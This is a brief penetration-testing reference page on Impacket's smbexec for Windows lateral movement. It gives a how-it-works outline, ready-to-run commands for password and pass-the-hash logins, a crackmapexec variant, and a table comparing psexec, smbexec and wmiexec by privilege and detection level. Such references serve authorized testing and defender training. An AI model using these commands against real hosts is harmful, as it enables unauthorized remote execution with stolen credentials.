Impacket — smbexec
How It Works
- Creates a service on target via SMB
- Service executes command, output redirected to file
- Reads output via SMB
- Deletes service
cmd.exe /Q /c.
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
SMBExec lateral movement: command execution via SMB service creation without binary upload.
impacket-smbexec DOMAIN/user:password@TARGET
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
cmd.exe /Q /c.
crackmapexec smb TARGET -u user -p password --exec-method smbexec -x "whoami"
| Feature | psexec | smbexec | wmiexec |
|---|---|---|---|
| Privilege | SYSTEM | SYSTEM | User |
| Binary upload | Yes | No | No |
| Protocol | SMB | SMB | WMI |
| Detection | High | Medium | Lower |
| Task | Command |
|---|---|
| Shell | impacket-smbexec DOMAIN/user:pass@TARGET |
| PtH | impacket-smbexec DOMAIN/user@TARGET -hashes :HASH |
| CME | crackmapexec smb TARGET --exec-method smbexec -x "cmd" |